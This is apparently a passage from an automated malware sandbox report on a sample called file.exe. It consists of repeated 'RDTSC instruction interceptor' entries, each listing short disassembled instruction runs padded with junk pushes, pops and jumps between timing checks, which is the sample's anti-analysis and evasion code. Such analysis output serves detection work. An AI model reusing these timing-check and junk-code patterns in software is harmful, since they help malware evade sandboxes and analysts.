                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B922 second address: B7B926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82F8C second address: B82FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FF154CE3621h 0x0000000d jo 00007FF154CE3616h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83100 second address: B83105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83105 second address: B8311B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF154CE3620h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8311B second address: B83143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF154EB226Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FF154EB2278h 0x00000014 jl 00007FF154EB2272h 0x0000001a jl 00007FF154EB2266h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B832A2 second address: B832A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83526 second address: B8354A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF154EB2266h 0x0000000a jmp 00007FF154EB2279h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8354A second address: B83562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FF154CE3622h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B836A2 second address: B836D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB2273h 0x00000009 jmp 00007FF154EB2279h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83F54 second address: B83F58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83F58 second address: B83F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83F62 second address: B83F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF154CE3616h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83F6C second address: B83FAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2277h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF154EB2270h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FF154EB226Eh 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83FAA second address: B83FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FF154CE3616h 0x0000000d jmp 00007FF154CE3629h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8440D second address: B84417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF154EB2266h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84417 second address: B8441B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B00DBD second address: B00DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB226Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B00DD0 second address: B00DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87BAE second address: B87BC3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF154EB226Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d jl 00007FF154EB2266h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87BC3 second address: B87BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007FF154CE362Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FF154CE3616h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87BDA second address: B87BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87BDE second address: B87BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A3EC second address: B4A3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A3F2 second address: B4A428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 xor dword ptr [esp], 765891B9h 0x0000000d jmp 00007FF154CE361Fh 0x00000012 push 4B063835h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jmp 00007FF154CE361Fh 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A654 second address: B4A66B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FF154EB2266h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A66B second address: B4A66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A66F second address: B4A6A8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF154EB2274h 0x00000016 popad 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c je 00007FF154EB2274h 0x00000022 push eax 0x00000023 push edx 0x00000024 jnl 00007FF154EB2266h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87EB1 second address: B87EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88403 second address: B8840F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8840F second address: B88415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8855B second address: B88561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88561 second address: B88565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88565 second address: B88598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2277h 0x00000007 jmp 00007FF154EB2274h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88708 second address: B88715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF154CE3616h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88715 second address: B8871D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8871D second address: B88723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8BA95 second address: B8BA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8EC56 second address: B8EC71 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF154CE361Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8EC71 second address: B8EC7B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF154EB226Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E68C second address: B8E69C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF154CE3616h 0x00000008 jne 00007FF154CE3616h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E69C second address: B8E6A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E7F2 second address: B8E819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE361Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007FF154CE361Fh 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E819 second address: B8E81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E975 second address: B8E98A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE3620h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E98A second address: B8E990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9374E second address: B93754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B93754 second address: B93758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B93027 second address: B9305B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF154CE3625h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF154CE3628h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9305B second address: B93069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B93069 second address: B93072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B931C1 second address: B931C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B934AB second address: B934B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B97A87 second address: B97A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B97A96 second address: B97A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B97A9C second address: B97AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 jno 00007FF154EB2266h 0x0000000f jmp 00007FF154EB2278h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B97E12 second address: B97E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B97F74 second address: B97F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B980BA second address: B980BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B980BE second address: B980CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FF154EB2272h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B980CC second address: B980D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF154CE3616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9821F second address: B9822E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9822E second address: B98232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98232 second address: B98236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98D4C second address: B98D60 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007FF154CE3616h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98D60 second address: B98D6A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98D6A second address: B98D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98D70 second address: B98D74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98D74 second address: B98D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnc 00007FF154CE3616h 0x0000000d jmp 00007FF154CE361Dh 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jng 00007FF154CE3616h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98D9D second address: B98DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98DA1 second address: B98DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF154CE3616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98DAD second address: B98DB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9D015 second address: B9D01B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9D01B second address: B9D025 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF154EB226Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9D025 second address: B9D03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 js 00007FF154CE3616h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FF154CE3622h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9D03D second address: B9D047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF154EB2266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9D047 second address: B9D052 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007FF154CE3616h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C1BC second address: B9C1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF154EB2266h 0x0000000a pushad 0x0000000b jbe 00007FF154EB2266h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C1D0 second address: B9C1E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF154CE3620h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C34A second address: B9C350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C350 second address: B9C359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C498 second address: B9C49D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C49D second address: B9C4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FF154CE3625h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9C65A second address: B9C664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF154EB2266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9CAB7 second address: B9CAE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF154CE361Dh 0x00000008 jmp 00007FF154CE3628h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9CAE3 second address: B9CAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF154EB2266h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push esi 0x0000000f jno 00007FF154EB2266h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA43F4 second address: BA4402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF154CE3616h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA2372 second address: BA2376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA24C0 second address: BA24CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA24CC second address: BA24D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA24D0 second address: BA24E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154CE361Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA24E0 second address: BA24F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 ja 00007FF154EB2266h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA24F0 second address: BA24F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA24F4 second address: BA2509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2271h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA2636 second address: BA2641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA2641 second address: BA2645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA2645 second address: BA2660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jng 00007FF154CE361Eh 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA2948 second address: BA294C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA2C0A second address: BA2C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnl 00007FF154CE3616h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA2EFA second address: BA2F04 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF154EB2282h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA31CC second address: BA3205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FF154CE3620h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF154CE3623h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 jbe 00007FF154CE3635h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA3205 second address: BA3218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB226Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA3DD7 second address: BA3DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA3DDB second address: BA3DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
